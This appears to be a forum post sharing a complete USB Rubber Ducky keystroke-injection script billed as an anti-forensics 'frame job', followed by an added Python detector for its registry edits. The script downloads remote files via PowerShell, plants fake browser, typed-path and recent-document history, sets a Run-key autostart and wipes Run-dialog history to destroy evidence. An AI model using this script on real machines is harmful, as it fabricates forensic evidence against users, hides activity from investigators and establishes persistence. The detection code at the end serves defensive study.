Rubber Ducky used at the Information Warfare Center


Found this while studying. Interesting.. Hope you guys like it.

http://www.informationwarfarecenter.com/Cyber-Secrets.html

http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt

REM Calling this the rubber ducky frame job.  This adds fake information into Windows Registry areas forensic
REM analysts use to track internet usage.
REM Author: Jeremy Martin - jeremy@informationwarfarecenter.com
REM Class: Anti Forensics
REM version 0.1.3
DELAY 1000
GUI r
DELAY 1000
REM Download a file and save it into the temp folder
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/CIR/CIR.pdf','%TEMP%\latest-CIR.pdf')
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Download a graphic and save it to temp
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/back.jpg','%TEMP%\back.jpg')
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Open Internet Explorer and generate traffic
STRING iexplore.exe http://www.informationwarfarecenter.com/index-4.html
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url1 /d http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url3 /d http://www.i-never-went-here-again.com /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url4 /d http://www.i-just-faked-the-url-address.com /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Document History
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /v 0 /d fake-data /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Add a startup link for a previously downloaded file.  Malware uses this quite often.
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Changes the background to the previously downloaded graphic
STRING REG ADD "HKCU\Control Panel\Desktop" /v Wallpaper /d %TEMP%\back.jpg /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Opens a previously downloaded file
STRING powershell Start-Process "%TEMP%\latest-CIR.pdf"
ENTER
DELAY 1500
GUI r
DELAY 1000
REM Removes evidence of previous entries
STRING REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Add another fake evidence entry
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /d "iexplore www.informationwarfarecenter.com/files/BGIU.zip" /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Opens a previously downloaded graphic
STRING %TEMP%/back.jpg
DELAY 1000
ENTER
DELAY 1000
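A defender-side check for the registry edits the script above makes, as an added example that is not part of the original post or the script author's work: it scans process-creation records (such as Sysmon Event ID 1 or Security 4688 with command-line logging) for reg.exe adding to or deleting from the history and autostart keys the script names, and reports whether the hits arrive in a tight burst. The record layout, function names, thresholds and sample events are assumptions constructed for illustration.

```python
import re
from datetime import datetime

# Key paths taken from the script in the post; labels are this example's own.
WATCHED = {
    r"\internet explorer\typedurls": "IE typed-URL history",
    r"\explorer\typedpaths": "Explorer typed-path history",
    r"\explorer\recentdocs": "recent-documents list",
    r"\explorer\runmru": "Run-dialog history",
    r"\currentversion\run": "Run-key autostart",
}
VERB_KEY = re.compile(r'\b(add|delete)\s+(?:"([^"]+)"|(\S+))', re.I)

def classify(image, cmdline):
    """Return (verb, label) when reg.exe adds to or deletes from a watched key."""
    if image.lower().rsplit("\\", 1)[-1] != "reg.exe":
        return None
    m = VERB_KEY.search(cmdline)
    if not m:
        return None
    key = (m.group(2) or m.group(3)).lower()
    for fragment, label in WATCHED.items():
        if fragment in key:
            return m.group(1).lower(), label
    return None

def detect(events, window_s=60, burst=3):
    """Return (hits, is_burst); is_burst means `burst` hits within window_s seconds."""
    hits = sorted(
        (datetime.fromisoformat(t), *c)
        for t, image, cmd in events
        if (c := classify(image, cmd))
    )
    is_burst = any(
        (hits[i + burst - 1][0] - hits[i][0]).total_seconds() <= window_s
        for i in range(len(hits) - burst + 1)
    )
    return hits, is_burst

# Constructed sample records (time, image, command line); not real telemetry.
REG = r"C:\Windows\System32\reg.exe"
SAMPLE = [
    ("2024-01-01T09:00:00", REG, r'reg QUERY "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName'),
    ("2024-01-01T10:00:00", REG, r'REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /f'),
    ("2024-01-01T10:00:03", REG, r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /f'),
    ("2024-01-01T10:00:06", REG, r'REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f'),
    ("2024-01-01T10:00:09", REG, r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /f'),
    ("2024-01-01T10:05:00", r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
]
```

Explorer and Internet Explorer normally write the history keys themselves, so reg.exe touching several of them seconds apart is the signal; for an examiner it also means these values alone should not be treated as proof of user activity.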
